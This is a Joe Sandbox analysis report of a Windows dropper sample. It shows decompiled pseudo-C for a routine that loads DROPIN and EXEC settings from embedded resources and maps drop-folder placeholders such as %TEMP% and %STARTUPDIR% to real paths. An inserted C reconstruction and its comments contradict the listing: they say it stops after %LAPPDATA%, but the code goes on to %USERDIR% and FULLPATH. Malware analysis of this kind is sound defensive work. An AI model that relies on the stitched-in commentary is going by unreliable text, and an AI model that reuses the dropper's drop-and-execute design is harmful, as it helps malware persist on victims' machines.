                                                      • Part of subcall function 003C3DF4: TlsFree.KERNEL32(00000019,003C421D,?,003C3165), ref: 003C3E1F
                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003C40D1
                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003C40DE
                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003C40EB
                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003C40F8
                                                    • TlsAlloc.KERNEL32(?,003C3165), ref: 003C4148
                                                    • TlsSetValue.KERNEL32(00000000,?,003C3165), ref: 003C4163
                                                    • __init_pointers.LIBCMT ref: 003C416D
                                                    • EncodePointer.KERNEL32(?,003C3165), ref: 003C417E
                                                    • EncodePointer.KERNEL32(?,003C3165), ref: 003C418B
                                                    • EncodePointer.KERNEL32(?,003C3165), ref: 003C4198
                                                    • EncodePointer.KERNEL32(?,003C3165), ref: 003C41A5
                                                    • DecodePointer.KERNEL32(003C3F78,?,003C3165), ref: 003C41C6
                                                    • __calloc_crt.LIBCMT ref: 003C41DB
                                                    • DecodePointer.KERNEL32(00000000,?,003C3165), ref: 003C41F5
                                                    • __initptd.LIBCMT ref: 003C4200
                                                    • GetCurrentThreadId.KERNEL32 ref: 003C4207
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                    • API String ID: 3732613303-3819984048
                                                    • Opcode ID: db9fbc2f920729adc9db080db060edece7a05baab57dde4f688145a9058bb15d
                                                    • Instruction ID: 9e031b1b8685ee2db28c768baf6b59a6dfdbff8f775995f722a09ddfc288e3b2
                                                    • Opcode Fuzzy Hash: db9fbc2f920729adc9db080db060edece7a05baab57dde4f688145a9058bb15d
                                                    • Instruction Fuzzy Hash: 2E315E71940224AEEB236B75EC09F493BACEB49720F0B492EE454D32B0DB35AC51DF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

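The next listing (E003C1EB0) tests the "DROPIN" setting against a list of drop-location placeholders using an inlined MSVC std::string::compare: memcmp over min(len, strlen(literal)), then a length tie-break, which is what the `_t92 | 0xffffffff` and `0 | (_t195 != 6)` fragments are. The following is an added example written for this report, not code from the sample or from Joe Sandbox, that reconstructs that check so an analyst can see that the match is exact (a value such as `%TEMP%\x.exe` would not match) and in which order the placeholders are tried. It assumes that the four checks routed through E003C25D0 (%PROGFILES% onward) perform the same exact comparison as the two inline ones; that helper's body is not on this page. The sample inputs in `main` are constructed.

```c
/* Added example: reconstruction of the DROPIN placeholder check in E003C1EB0.
 * Editor's code, not the sample's. Assumes E003C25D0 compares the same way as
 * the inlined std::string::compare seen for %TEMP% and %APPDATA%. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Three-way compare of a length-counted string against a NUL-terminated
 * literal, as the decompiled code does it: compare the common prefix first
 * (E003C1040 in the listing, with the length clamped to the literal's size),
 * then break ties on length. Returns <0, 0 or >0. */
static int str_compare_literal(const char *s, size_t len, const char *lit)
{
    size_t lit_len = strlen(lit);
    size_t n = len < lit_len ? len : lit_len;    /* "if (_t195 >= 6) _t91 = 6" */
    int r = memcmp(s, lit, n);
    if (r != 0)
        return r;
    if (len < lit_len)
        return -1;                                /* "_t92 = _t92 | 0xffffffff" */
    return len != lit_len;                        /* "_t92 = 0 | (_t195 != 6)" */
}

/* Placeholders in the order the listing tests them. */
static const char *const DROPIN_PLACEHOLDERS[] = {
    "%TEMP%", "%APPDATA%", "%PROGFILES%", "%DEFDRIVE%", "%STARTUPDIR%", "%LAPPDATA%",
};
#define N_PLACEHOLDERS (sizeof DROPIN_PLACEHOLDERS / sizeof DROPIN_PLACEHOLDERS[0])

/* Index of the placeholder the DROPIN value is exactly equal to, or -1.
 * The listing is cut off after the %LAPPDATA% check, so no default branch
 * is assumed here. */
int dropin_placeholder_index(const char *value, size_t len)
{
    for (size_t i = 0; i < N_PLACEHOLDERS; i++)
        if (str_compare_literal(value, len, DROPIN_PLACEHOLDERS[i]) == 0)
            return (int)i;
    return -1;
}

int main(void)
{
    /* Constructed inputs: exact match, trailing path, truncated, last entry. */
    const char *samples[] = { "%TEMP%", "%TEMP%\\x.exe", "%TEMP", "%LAPPDATA%" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-14s -> %d\n", samples[i],
               dropin_placeholder_index(samples[i], strlen(samples[i])));
    return 0;
}
```

Because the comparison is exact, a decoded configuration will carry the bare token in DROPIN; the file name and the expansion of each token are handled outside the part of the function shown on this page.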
                                                    C-Code - Quality: 69%
                                                    			// Dropper configuration: builds the key names "DROPIN" and "EXEC" as
                                                    			// std::string objects (E003C1420), looks each one up (E003C1AD0, apparently
                                                    			// a keyed lookup returning a std::string) and move-assigns the value into a
                                                    			// global std::string (buffer 0x3cdbf8 / size 0x3cdc08 / capacity 0x3cdc0c
                                                    			// for DROPIN; 0x3cdc14 / 0x3cdc24 / 0x3cdc28 for EXEC). The "capacity >= 0x10"
                                                    			// tests are the MSVC small-string optimisation: below 0x10 the characters live
                                                    			// inline, otherwise a heap pointer is freed (E003C2BB1) or stolen. DROPIN is
                                                    			// then compared for exact equality, in order, against %TEMP%, %APPDATA%,
                                                    			// %PROGFILES%, %DEFDRIVE%, %STARTUPDIR% and %LAPPDATA%; the min(len, 6) /
                                                    			// min(len, 9) compares followed by a length test are std::string::compare
                                                    			// against a literal. The listing is cut off after the %LAPPDATA% check.
                                                    			E003C1EB0(intOrPtr __edx, void* __eflags) {
                                                    				char _v12;
                                                    				char _v16;
                                                    				signed int _v24;
                                                    				intOrPtr _v28;
                                                    				signed int _v36;
                                                    				char _v48;
                                                    				char _v56;
                                                    				char _v60;
                                                    				char _v64;
                                                    				intOrPtr _v68;
                                                    				intOrPtr _v72;
                                                    				char _v88;
                                                    				signed int _v92;
                                                    				signed int _v96;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t77;
                                                    				signed int _t79;
                                                    				char _t91;
                                                    				signed int _t92;
                                                    				char _t94;
                                                    				signed int _t95;
                                                    				signed int _t97;
                                                    				signed int _t98;
                                                    				signed int _t99;
                                                    				signed int _t100;
                                                    				signed int _t101;
                                                    				void* _t104;
                                                    				void* _t106;
                                                    				void* _t109;
                                                    				void* _t113;
                                                    				void* _t115;
                                                    				void* _t117;
                                                    				void* _t133;
                                                    				signed int _t135;
                                                    				void* _t136;
                                                    				signed int _t167;
                                                    				intOrPtr _t170;
                                                    				void* _t171;
                                                    				void* _t172;
                                                    				signed int _t174;
                                                    				intOrPtr _t177;
                                                    				void* _t184;
                                                    				void* _t190;
                                                    				char* _t191;
                                                    				intOrPtr* _t192;
                                                    				signed int _t193;
                                                    				intOrPtr* _t194;
                                                    				char _t195;
                                                    				void* _t198;
                                                    				signed int _t205;
                                                    				signed int _t207;
                                                    				signed int _t208;
                                                    				signed int _t209;
                                                    				void* _t216;
                                                    				signed int _t223;
                                                    
                                                    				_t166 = __edx;
                                                    				_push(0xffffffff);
                                                    				_t207 = (_t205 & 0xfffffff8) - 0x48;
                                                    				_t77 =  *0x3cd07c; // 0xbd8f316a
                                                    				_v24 = _t77 ^ _t207;
                                                    				_t79 =  *0x3cd07c; // 0xbd8f316a
                                                    				 *[fs:0x0] =  &_v16;
                                                    				E003C1870( &_v56);
                                                    				_t208 = _t207 - 0x1c;
                                                    				_v12 = 0;
                                                    				_t191 = _t208;
                                                    				 *((intOrPtr*)(_t191 + 0x10)) = 0;
                                                    				 *((intOrPtr*)(_t191 + 0x14)) = 0xf;
                                                    				 *_t191 = 0;
                                                    				_v92 = _t208;
                                                    				E003C1420("DROPIN", 6, _t191);
                                                    				_t192 = E003C1AD0( &_v88, _t166,  &_v60, _t79 ^ _t207, _t172, _t190, _t133,  *[fs:0x0], E003C86C0);
                                                    				if(_t192 == 0x3cdbf8) {
                                                    					_t174 = 0;
                                                    					__eflags = 0;
                                                    				} else {
                                                    					if( *0x3cdc0c >= 0x10) {
                                                    						_t171 =  *0x3cdbf8; // 0x4d455400
                                                    						_push(_t171);
                                                    						E003C2BB1();
                                                    						_t208 = _t208 + 4;
                                                    					}
                                                    					_t174 = 0;
                                                    					 *0x3cdc0c = 0xf;
                                                    					 *0x3cdc08 = 0;
                                                    					 *0x3cdbf8 = 0;
                                                    					if( *((intOrPtr*)(_t192 + 0x14)) >= 0x10) {
                                                    						 *0x3cdbf8 =  *_t192;
                                                    						 *_t192 = 0;
                                                    					} else {
                                                    						E003C2850(0x3cdbf8, _t192,  *((intOrPtr*)(_t192 + 0x10)) + 1);
                                                    						_t208 = _t208 + 0xc;
                                                    					}
                                                    					 *0x3cdc08 =  *((intOrPtr*)(_t192 + 0x10));
                                                    					_t166 =  *((intOrPtr*)(_t192 + 0x14));
                                                    					 *0x3cdc0c =  *((intOrPtr*)(_t192 + 0x14));
                                                    					 *((intOrPtr*)(_t192 + 0x10)) = _t174;
                                                    					 *((intOrPtr*)(_t192 + 0x14)) = _t174;
                                                    				}
                                                    				_v12 = 0;
                                                    				if(_v68 >= 0x10) {
                                                    					_push(_v88);
                                                    					E003C2BB1();
                                                    					_t208 = _t208 + 4;
                                                    				}
                                                    				_t209 = _t208 - 0x1c;
                                                    				_t193 = _t209;
                                                    				 *((intOrPtr*)(_t193 + 0x10)) = _t174;
                                                    				 *((intOrPtr*)(_t193 + 0x14)) = 0xf;
                                                    				_v92 = _t209;
                                                    				 *_t193 = 0;
                                                    				E003C1420("EXEC", 4, _t193);
                                                    				_push( &_v60);
                                                    				_t194 = E003C1AD0( &_v88, _t166);
                                                    				if(_t194 != 0x3cdc14) {
                                                    					_t216 =  *0x3cdc28 - 0x10; // 0xf
                                                    					if(_t216 >= 0) {
                                                    						_t170 =  *0x3cdc14; // 0x0
                                                    						_push(_t170);
                                                    						E003C2BB1();
                                                    						_t209 = _t209 + 4;
                                                    					}
                                                    					 *0x3cdc28 = 0xf;
                                                    					 *0x3cdc24 = 0;
                                                    					 *0x3cdc14 = 0;
                                                    					if( *((intOrPtr*)(_t194 + 0x14)) >= 0x10) {
                                                    						 *0x3cdc14 =  *_t194;
                                                    						 *_t194 = 0;
                                                    					} else {
                                                    						E003C2850(0x3cdc14, _t194,  *((intOrPtr*)(_t194 + 0x10)) + 1);
                                                    						_t209 = _t209 + 0xc;
                                                    					}
                                                    					 *0x3cdc24 =  *((intOrPtr*)(_t194 + 0x10));
                                                    					 *0x3cdc28 =  *((intOrPtr*)(_t194 + 0x14));
                                                    					 *((intOrPtr*)(_t194 + 0x10)) = 0;
                                                    					 *((intOrPtr*)(_t194 + 0x14)) = 0;
                                                    				}
                                                    				_v16 = 0;
                                                    				if(_v72 >= 0x10) {
                                                    					_push(_v92);
                                                    					E003C2BB1();
                                                    					_t209 = _t209 + 4;
                                                    				}
                                                    				_t195 =  *0x3cdc08; // 0x0
                                                    				_t91 = _t195;
                                                    				if(_t195 >= 6) {
                                                    					_t91 = 6;
                                                    				}
                                                    				_t177 =  *0x3cdc0c; // 0xf
                                                    				_t135 =  *0x3cdbf8; // 0x4d455400
                                                    				_t167 = _t135;
                                                    				if(_t177 < 0x10) {
                                                    					_t167 = 0x3cdbf8;
                                                    				}
                                                    				_t92 = E003C1040(_t91, "%TEMP%", _t167);
                                                    				if(_t92 == 0) {
                                                    					if(_t195 >= 6) {
                                                    						__eflags = _t195 - 6;
                                                    						_t35 = _t195 != 6;
                                                    						__eflags = _t35;
                                                    						_t92 = 0 | _t35;
                                                    					} else {
                                                    						_t92 = _t92 | 0xffffffff;
                                                    					}
                                                    					_t223 = _t92;
                                                    				}
                                                    				if((_t92 & 0xffffff00 | _t223 == 0x00000000) == 0) {
                                                    					_t94 = _t195;
                                                    					__eflags = _t195 - 9;
                                                    					if(_t195 >= 9) {
                                                    						_t94 = 9;
                                                    					}
                                                    					_t168 = _t135;
                                                    					__eflags = _t177 - 0x10;
                                                    					if(_t177 < 0x10) {
                                                    						_t168 = 0x3cdbf8;
                                                    					}
                                                    					_t95 = E003C1040(_t94, "%APPDATA%", _t168);
                                                    					__eflags = _t95;
                                                    					if(__eflags == 0) {
                                                    						__eflags = _t195 - 9;
                                                    						if(_t195 >= 9) {
                                                    							__eflags = _t195 - 9;
                                                    							_t43 = _t195 != 9;
                                                    							__eflags = _t43;
                                                    							_t95 = 0 | _t43;
                                                    						} else {
                                                    							_t95 = _t95 | 0xffffffff;
                                                    						}
                                                    						__eflags = _t95;
                                                    					}
                                                    					if(__eflags == 0) {
                                                    						_t97 = E003C25D0("%PROGFILES%", 0x3cdbf8);
                                                    						__eflags = _t97;
                                                    						if(_t97 == 0) {
                                                    							_t98 = E003C25D0("%DEFDRIVE%", 0x3cdbf8);
                                                    							__eflags = _t98;
                                                    							if(_t98 == 0) {
                                                    								_t99 = E003C25D0("%STARTUPDIR%", 0x3cdbf8);
                                                    								__eflags = _t99;
                                                    								if(_t99 == 0) {
                                                    									_t100 = E003C25D0("%LAPPDATA%", 0x3cdbf8);
                                                    									__eflags = _t100;
                                                    									if(_t100 == 0) {
                                                    										_t101 = E003C25D0("%USERDIR%", 0x3cdbf8);
                                                    										__eflags = _t101;
                                                    										if(_t101 == 0) {
                                                    											_t209 = _t209 - 0x1c;
                                                    											_v96 = _t209;
                                                    											E003C1390("FULLPATH", _t209);
                                                    											_t168 =  &_v64;
                                                    											_push( &_v64);
                                                    											_t104 = E003C1AD0( &_v92,  &_v64);
                                                    											_v48 = 0xb;
                                                    										} else {
                                                    											_t104 = E003C1C50( &_v92, 5);
                                                    											_t209 = _t209 + 4;
                                                    											_v16 = 0xa;
                                                    										}
                                                    									} else {
                                                    										_t104 = E003C1C50( &_v92, 0x1c);
                                                    										_t209 = _t209 + 4;
                                                    										_v16 = 9;
                                                    									}
                                                    								} else {
                                                    									_t104 = E003C1C50( &_v92, 0x18);
                                                    									_t209 = _t209 + 4;
                                                    									_v16 = 8;
                                                    								}
                                                    								L59:
                                                    								E003C23D0(_t104, 0x3cdc30);
                                                    								_t106 = E003C2340( &_v96);
                                                    								goto L60;
                                                    							}
                                                    							_t159 =  &_v92;
                                                    							_t109 = E003C1DA0(_t135,  &_v92);
                                                    							_v16 = 6;
                                                    							E003C23D0(_t109, 0x3cdc30);
                                                    							_v16 = 0;
                                                    							__eflags = _v72 - 0x10;
                                                    							if(_v72 >= 0x10) {
                                                    								_t159 = _v92;
                                                    								_push(_v92);
                                                    								E003C2BB1();
                                                    								_t209 = _t209 + 4;
                                                    							}
                                                    							__eflags =  *0x3cdc40;
                                                    							if( *0x3cdc40 <= 0) {
                                                    								_t106 = E003C1420("C:\\", 3, 0x3cdc30);
                                                    								goto L60;
                                                    							} else {
                                                    								_t104 = E003C2440(_t159,  &_v92, 0x3cdc30, 3);
                                                    								_v24 = 7;
                                                    								goto L59;
                                                    							}
                                                    						}
                                                    						_t113 = E003C1C50( &_v92, 0x26);
                                                    						_t209 = _t209 + 4;
                                                    						_v16 = 5;
                                                    						_t106 = E003C23D0(_t113, 0x3cdc30);
                                                    						__eflags = _v72 - 0x10;
                                                    						if(_v72 >= 0x10) {
                                                    							_push(_v92);
                                                    							_t106 = E003C2BB1();
                                                    							_t209 = _t209 + 4;
                                                    						}
                                                    					} else {
                                                    						_t115 = E003C1C50( &_v92, 0x1a);
                                                    						_t209 = _t209 + 4;
                                                    						_v16 = 4;
                                                    						_t106 = E003C23D0(_t115, 0x3cdc30);
                                                    						__eflags = _v72 - 0x10;
                                                    						if(_v72 >= 0x10) {
                                                    							_t168 = _v92;
                                                    							_push(_v92);
                                                    							_t106 = E003C2BB1();
                                                    							_t209 = _t209 + 4;
                                                    						}
                                                    					}
                                                    					goto L60;
                                                    				} else {
                                                    					_t117 = E003C1E20(_t135,  &_v92);
                                                    					_v16 = 3;
                                                    					_t106 = E003C23D0(_t117, 0x3cdc30);
                                                    					if(_v72 >= 0x10) {
                                                    						_push(_v92);
                                                    						_t106 = E003C2BB1();
                                                    						_t209 = _t209 + 4;
                                                    					}
                                                    					L60:
                                                    					if(_v48 >= 0x10) {
                                                    						_push(_v68);
                                                    						_t106 = E003C2BB1();
                                                    						_t209 = _t209 + 4;
                                                    					}
                                                    					 *[fs:0x0] = _v28;
                                                    					_pop(_t184);
                                                    					_pop(_t198);
                                                    					_pop(_t136);
                                                    					return E003C2701(_t106, _t136, _v36 ^ _t209, _t168, _t184, _t198);
                                                    				}
                                                    			}

                                                    0x003c1eb0
                                                    0x003c1eb6
                                                    0x003c1ec4
                                                    0x003c1ec7
                                                    0x003c1ece
                                                    0x003c1ed5
                                                    0x003c1ee1
                                                    0x003c1eec
                                                    0x003c1ef3
                                                    0x003c1ef6
                                                    0x003c1efa
                                                    0x003c1f01
                                                    0x003c1f04
                                                    0x003c1f07
                                                    0x003c1f11
                                                    0x003c1f15
                                                    0x003c1f28
                                                    0x003c1f30
                                                    0x003c1f9d
                                                    0x003c1f9d
                                                    0x003c1f32
                                                    0x003c1f39
                                                    0x003c1f3b
                                                    0x003c1f41
                                                    0x003c1f42
                                                    0x003c1f47
                                                    0x003c1f47
                                                    0x003c1f4a
                                                    0x003c1f4c
                                                    0x003c1f52
                                                    0x003c1f58
                                                    0x003c1f63
                                                    0x003c1f7c
                                                    0x003c1f81
                                                    0x003c1f65
                                                    0x003c1f70
                                                    0x003c1f75
                                                    0x003c1f75
                                                    0x003c1f86
                                                    0x003c1f8c
                                                    0x003c1f8f
                                                    0x003c1f95
                                                    0x003c1f98
                                                    0x003c1f98
                                                    0x003c1f9f
                                                    0x003c1fa9
                                                    0x003c1faf
                                                    0x003c1fb0
                                                    0x003c1fb5
                                                    0x003c1fb5
                                                    0x003c1fb8
                                                    0x003c1fbb
                                                    0x003c1fbd
                                                    0x003c1fc0
                                                    0x003c1fcd
                                                    0x003c1fd1
                                                    0x003c1fd4
                                                    0x003c1fdd
                                                    0x003c1fe7
                                                    0x003c1ff4
                                                    0x003c1ff6
                                                    0x003c1ffc
                                                    0x003c1ffe
                                                    0x003c2004
                                                    0x003c2005
                                                    0x003c200a
                                                    0x003c200a
                                                    0x003c200d
                                                    0x003c2015
                                                    0x003c201b
                                                    0x003c2024
                                                    0x003c203d
                                                    0x003c2042
                                                    0x003c2026
                                                    0x003c2031
                                                    0x003c2036
                                                    0x003c2036
                                                    0x003c2047
                                                    0x003c2050
                                                    0x003c2056
                                                    0x003c2059
                                                    0x003c2059
                                                    0x003c205c
                                                    0x003c2065
                                                    0x003c206b
                                                    0x003c206c
                                                    0x003c2071
                                                    0x003c2071
                                                    0x003c2074
                                                    0x003c207a
                                                    0x003c207f
                                                    0x003c2081
                                                    0x003c2081
                                                    0x003c2086
                                                    0x003c208c
                                                    0x003c2092
                                                    0x003c2097
                                                    0x003c2099
                                                    0x003c2099
                                                    0x003c20a3
                                                    0x003c20aa
                                                    0x003c20af
                                                    0x003c20b8
                                                    0x003c20bb
                                                    0x003c20bb
                                                    0x003c20bb
                                                    0x003c20b1
                                                    0x003c20b1
                                                    0x003c20b1
                                                    0x003c20be
                                                    0x003c20be
                                                    0x003c20c5
                                                    0x003c20fe
                                                    0x003c2100
                                                    0x003c2103
                                                    0x003c2105
                                                    0x003c2105
                                                    0x003c210a
                                                    0x003c210c
                                                    0x003c210f
                                                    0x003c2111
                                                    0x003c2111
                                                    0x003c211b
                                                    0x003c2120
                                                    0x003c2122
                                                    0x003c2124
                                                    0x003c2127
                                                    0x003c2130
                                                    0x003c2133
                                                    0x003c2133
                                                    0x003c2133
                                                    0x003c2129
                                                    0x003c2129
                                                    0x003c2129
                                                    0x003c2136
                                                    0x003c2136
                                                    0x003c213d
                                                    0x003c2185
                                                    0x003c218a
                                                    0x003c218c
                                                    0x003c21d4
                                                    0x003c21d9
                                                    0x003c21db
                                                    0x003c2258
                                                    0x003c225d
                                                    0x003c225f
                                                    0x003c2280
                                                    0x003c2285
                                                    0x003c2287
                                                    0x003c22a8
                                                    0x003c22ad
                                                    0x003c22af
                                                    0x003c22c6
                                                    0x003c22d0
                                                    0x003c22d4
                                                    0x003c22d9
                                                    0x003c22dd
                                                    0x003c22e2
                                                    0x003c22e7
                                                    0x003c22b1
                                                    0x003c22b7
                                                    0x003c22bc
                                                    0x003c22bf
                                                    0x003c22bf
                                                    0x003c2289
                                                    0x003c228f
                                                    0x003c2294
                                                    0x003c2297
                                                    0x003c2297
                                                    0x003c2261
                                                    0x003c2267
                                                    0x003c226c
                                                    0x003c226f
                                                    0x003c226f
                                                    0x003c22ec
                                                    0x003c22f3
                                                    0x003c22fc
                                                    0x00000000
                                                    0x003c22fc
                                                    0x003c21dd
                                                    0x003c21e1
                                                    0x003c21ed
                                                    0x003c21f2
                                                    0x003c21f7
                                                    0x003c21fc
                                                    0x003c2201
                                                    0x003c2203
                                                    0x003c2207
                                                    0x003c2208
                                                    0x003c220d
                                                    0x003c220d
                                                    0x003c2210
                                                    0x003c2217
                                                    0x003c2244
                                                    0x00000000
                                                    0x003c2219
                                                    0x003c2226
                                                    0x003c222b
                                                    0x00000000
                                                    0x003c222b
                                                    0x003c2217
                                                    0x003c2194
                                                    0x003c2199
                                                    0x003c21a3
                                                    0x003c21a8
                                                    0x003c21ad
                                                    0x003c21b2
                                                    0x003c21bc
                                                    0x003c21bd
                                                    0x003c21c2
                                                    0x003c21c2
                                                    0x003c213f
                                                    0x003c2145
                                                    0x003c214a
                                                    0x003c2154
                                                    0x003c2159
                                                    0x003c215e
                                                    0x003c2163
                                                    0x003c2169
                                                    0x003c216d
                                                    0x003c216e
                                                    0x003c2173
                                                    0x003c2173
                                                    0x003c2163
                                                    0x00000000
                                                    0x003c20c7
                                                    0x003c20cb
                                                    0x003c20d7
                                                    0x003c20dc
                                                    0x003c20e6
                                                    0x003c20f0
                                                    0x003c20f1
                                                    0x003c20f6
                                                    0x003c20f6
                                                    0x003c2301
                                                    0x003c2306
                                                    0x003c230c
                                                    0x003c230d
                                                    0x003c2312
                                                    0x003c2312
                                                    0x003c2319
                                                    0x003c2321
                                                    0x003c2322
                                                    0x003c2323
                                                    0x003c2332
                                                    0x003c2332

                                                    APIs
                                                      • Part of subcall function 003C1AD0: FindResourceA.KERNEL32(00000000,?,?), ref: 003C1B20
                                                    • _memmove.LIBCMT ref: 003C1F70
                                                      • Part of subcall function 003C1C50: SHGetSpecialFolderPathA.SHELL32(00000000,?,?,00000000,BD8F316A), ref: 003C1C9E
                                                      • Part of subcall function 003C23D0: _memmove.LIBCMT ref: 003C2403
                                                    • _memmove.LIBCMT ref: 003C2031
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _memmove$FindFolderPathResourceSpecial
                                                    • String ID: %APPDATA%$%DEFDRIVE%$%LAPPDATA%$%PROGFILES%$%STARTUPDIR%$%TEMP%$%USERDIR%$C:\$DROPIN$EXEC$FULLPATH
                                                    • API String ID: 1519558674-3215377631
                                                    • Opcode ID: 1918c90f61fa99b5b94fe500c2e8d758c1e0388e9a320282e47e110cd11ee9db
                                                    • Instruction ID: 73e405d3781e5564b7e3edcdbf1a7afb84b0c1790dbb6b4476b0446678833df6
                                                    • Opcode Fuzzy Hash: 1918c90f61fa99b5b94fe500c2e8d758c1e0388e9a320282e47e110cd11ee9db
                                                    • Instruction Fuzzy Hash: F8C19AB59183408BD712EF289842F1BB7E5AB96310F05493DF896CB292EB75EC44C793
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 72%
                                                    			E003C1AD0(void** __ecx, CHAR* __edx, intOrPtr _a4, CHAR* _a8, intOrPtr _a28) {
                                                    				struct HINSTANCE__* _v8;
                                                    				char _v16;
                                                    				signed int _v20;
                                                    				char _v279;
                                                    				char _v280;
                                                    				void* _v284;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t33;
                                                    				signed int _t34;
                                                    				intOrPtr _t36;
                                                    				void* _t39;
                                                    				long _t40;
                                                    				intOrPtr* _t46;
                                                    				struct HRSRC__* _t59;
                                                    				void* _t61;
                                                    				CHAR* _t63;
                                                    				intOrPtr _t65;
                                                    				void* _t75;
                                                    				void* _t77;
                                                    				void** _t80;
                                                    				void* _t81;
                                                    				signed int _t82;
                                                    				void* _t83;
                                                    				void* _t84;
                                                    
                                                    				_t71 = __edx;
                                                    				_push(0xffffffff);
                                                    				_push(E003C8598);
                                                    				_push( *[fs:0x0]);
                                                    				_t84 = _t83 - 0x10c;
                                                    				_t33 =  *0x3cd07c; // 0xbd8f316a
                                                    				_t34 = _t33 ^ _t82;
                                                    				_v20 = _t34;
                                                    				_push(_t34);
                                                    				 *[fs:0x0] =  &_v16;
                                                    				_t36 = _a4;
                                                    				_t80 = __ecx;
                                                    				_v284 = 0;
                                                    				_v8 = 0;
                                                    				_t63 = _a8;
                                                    				if(_a28 < 0x10) {
                                                    					_t63 =  &_a8;
                                                    				}
                                                    				_t59 = FindResourceA(0, _t63,  *(_t36 + 0x1c));
                                                    				if(_t59 != 0) {
                                                    					_t39 = LoadResource(0, _t59);
                                                    					_t75 = _t39;
                                                    					if(_t75 != 0) {
                                                    						_t40 = SizeofResource(0, _t59);
                                                    						_v284 = LockResource(_t75);
                                                    						_v280 = 0;
                                                    						E003C57C0( &_v279, 0, 0x103);
                                                    						E003C2850( &_v280, _v284, _t40);
                                                    						_t84 = _t84 + 0x18;
                                                    						FreeResource(_t75);
                                                    						_t46 =  &_v280;
                                                    						_t80[5] = 0xf;
                                                    						_t80[4] = 0;
                                                    						 *_t80 = 0;
                                                    						_t26 = _t46 + 1; // 0x1
                                                    						_t71 = _t26;
                                                    						do {
                                                    							_t65 =  *_t46;
                                                    							_t46 = _t46 + 1;
                                                    						} while (_t65 != 0);
                                                    						E003C1420( &_v280, _t46 - _t71, _t80);
                                                    						if(_a28 >= 0x10) {
                                                    							_push(_a8);
                                                    							goto L12;
                                                    						}
                                                    					} else {
                                                    						_t80[4] = _t39;
                                                    						_t80[5] = 0xf;
                                                    						 *_t80 = _t39;
                                                    						E003C1420(0x3cb0aa, _t75, _t80);
                                                    						if(_a28 >= 0x10) {
                                                    							_t71 = _a8;
                                                    							_push(_a8);
                                                    							goto L12;
                                                    						}
                                                    					}
                                                    				} else {
                                                    					_t80[4] = 0;
                                                    					_t80[5] = 0xf;
                                                    					 *_t80 = 0;
                                                    					E003C1420(0x3cb0aa, 0, _t80);
                                                    					if(_a28 >= 0x10) {
                                                    						_push(_a8);
                                                    						L12:
                                                    						E003C2BB1();
                                                    					}
                                                    				}
                                                    				 *[fs:0x0] = _v16;
                                                    				_pop(_t77);
                                                    				_pop(_t81);
                                                    				_pop(_t61);
                                                    				return E003C2701(_t80, _t61, _v20 ^ _t82, _t71, _t77, _t81);
                                                    			}






























                                                    APIs
                                                    • FindResourceA.KERNEL32(00000000,?,?), ref: 003C1B20
                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 003C1B5A
                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 003C1B92
                                                    • LockResource.KERNEL32(00000000), ref: 003C1B9B
                                                    • _memset.LIBCMT ref: 003C1BBC
                                                    • _memmove.LIBCMT ref: 003C1BD0
                                                    • FreeResource.KERNEL32(00000000), ref: 003C1BD9
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Resource$FindFreeLoadLockSizeof_memmove_memset
                                                    • String ID:
                                                    • API String ID: 4079094743-0
                                                    • Opcode ID: 1d956f980d84911c39189db9744b559c9639ae4c5f3979b073daaa510dc817e7
                                                    • Instruction ID: 24469af2804e29e36c4d2d2effe386160f9a85adf712f630c3e67e56fa7fe845
